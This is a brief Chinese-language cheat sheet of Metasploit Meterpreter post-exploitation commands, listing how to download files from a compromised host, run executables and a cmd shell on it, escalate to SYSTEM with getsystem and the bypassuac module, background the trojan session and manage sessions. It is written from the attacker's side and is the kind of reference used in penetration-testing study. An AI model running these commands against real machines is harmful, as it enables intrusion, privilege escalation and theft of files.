1、download命令可以下载远程主机上的文件
命令:download文件名 文件路径to保存的位置
注意:windows路径要使用双斜线【linux向左边,windows向右边】
如果我们需要递归下载整个目录包括子目录和文件,我们可以使用download -r命令
2、在目标主机上执行exe文件
execute -f c://1.exe
3、创建cmd新通道
execute -f cmd -c
4、显示进程
命令:ps
5、获取目标主机的cmd—shell
shell命令可以进入目标主机的cmd
6、查看当前用户权限
getuid
7、获取admin权限
getsystem
命令可以提权到本地系统权限
8、木马模式调到后台执行
background
9、打开监听模块
use exploit/windows/local/bypassuac
10、调用msf中本地本地脚本提升权限
use exploit/windows/local/…
11、查看当前木马控制的会话
sessions -i